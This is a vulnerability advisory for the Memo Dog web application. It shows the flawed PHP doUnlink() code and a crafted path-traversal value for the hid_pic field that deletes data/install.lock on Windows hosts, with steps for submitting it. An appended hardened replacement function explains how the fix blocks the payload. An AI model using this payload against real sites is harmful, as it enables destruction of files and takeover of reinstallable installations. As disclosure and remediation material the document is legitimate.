Memo Dog arbitrary file delete bug warning - Black Bar Safety Net

2012-08-26T00:00:00
ID MYHACK58:62201234712
Type myhack58
Reporter Anonymous
Modified 2012-08-26T00:00:00

Description

Use conditions:

  1. Only works on Windows hosts; Linux is not affected, at least on my current machine.

  2. Registered user

  3. The file to be deleted must be readable and writable

In modules/ajax/event.mod.php

The picture-deletion function with its protective check:

function doUnlink($pic){
    if(!$pic) return false;
    // The suffix is taken from the caller-supplied path, so it is attacker-controlled as well.
    $type = trim(strtolower(end(explode(".",$pic))));
    // The pattern has no end anchor, so anything may follow the "_b.<type>" part.
    $exp = '././images/event/[0-9]{10}'.MEMBER_ID.'_b.'.$type;
    if(ereg($exp,$pic)){
        unlink($pic);
        // Note: strtr() with two string arguments translates character by character, not substring by substring.
        unlink(strtr($pic,'_b.','_s.'));
        return true;
    }else{
        return false;
    }
}

The function is called in onloadPic:

if($_FILES['pic']['name']){
    //Omitted.....................
    $hid_pic = $this->Post['hid_pic'];   // taken straight from the POST body
    $eid = (int) $this->Post['id'];
    $this->doUnlink($hid_pic,$eid);      // the second argument is ignored by doUnlink()
    //Omitted.............
}

As long as $_FILES['pic']['name'] is not empty, we can construct hid_pic ourselves.

hid_pic content:

././images/event/1234567890{MEMBER_ID}_b.{suffix of the file you want to delete}/../../../{file you want to delete}

For example, to remove the ./data/install.lock file when my MEMBER_ID is 2:

././images/event/12345678902_b.lock/../../../data/install.lock

The local test succeeded.

Actual use:

In index.php?mod=event&code=pevent

Upload a picture, capture the request, and fill hid_pic with ././images/event/12345678902_b.lock/../../../data/install.lock; that is enough.

Fix:

do it yourself
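As an added example (not the project's own code and not the author's fix), a hardened replacement for doUnlink() that ignores any directory part supplied by the client, anchors the pattern on both ends and requires the resolved file to sit directly inside the picture directory; it assumes MEMBER_ID holds the logged-in user's id, that pictures live under images/event next to the script, and an image-suffix whitelist, all of which are assumptions.

```php
<?php
// Added example: hardened doUnlink(). MEMBER_ID and the directory are assumptions.
define('MEMBER_ID', 2);                                    // assumed: the session's user id
define('EVENT_PIC_DIR', __DIR__ . '/images/event');       // assumed picture directory

function doUnlinkSafe($pic) {
    if (!is_string($pic) || $pic === '') return false;

    // Keep only the file name: a traversal payload such as
    // "././images/event/12345678902_b.lock/../../../data/install.lock" collapses to "install.lock".
    $name = basename(str_replace('\\', '/', $pic));

    // Anchored on both ends (^ and $): ten digits, this member's id, "_b.", a whitelisted
    // image suffix, and nothing after it. The original ereg() pattern had no end anchor.
    $exp = '/^[0-9]{10}' . preg_quote((string) MEMBER_ID, '/') . '_b\.(jpg|jpeg|gif|png)$/i';
    if (!preg_match($exp, $name)) return false;

    // Resolve both paths and require the target to be a regular file directly under the
    // picture directory. realpath() is what makes the Windows-only behaviour of the bug
    // irrelevant: Win32 drops ".." lexically before consulting the file system (so a
    // nonexistent "x_b.lock/.." component is fine), whereas POSIX resolves component by
    // component and fails; here the canonical path is compared instead of the raw string.
    $base = realpath(EVENT_PIC_DIR);
    $full = realpath(EVENT_PIC_DIR . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $full === false) return false;
    if (dirname($full) !== $base || !is_file($full)) return false;

    $ok = unlink($full);

    // Substring replacement for the thumbnail; the original strtr() call with two string
    // arguments translated single characters, turning every "b" into "s".
    $small = $base . DIRECTORY_SEPARATOR . str_replace('_b.', '_s.', $name);
    if (is_file($small)) unlink($small);
    return $ok;
}
```

With the page's payload as input, doUnlinkSafe() returns false before touching the file system, since basename() reduces it to install.lock and that fails the anchored pattern.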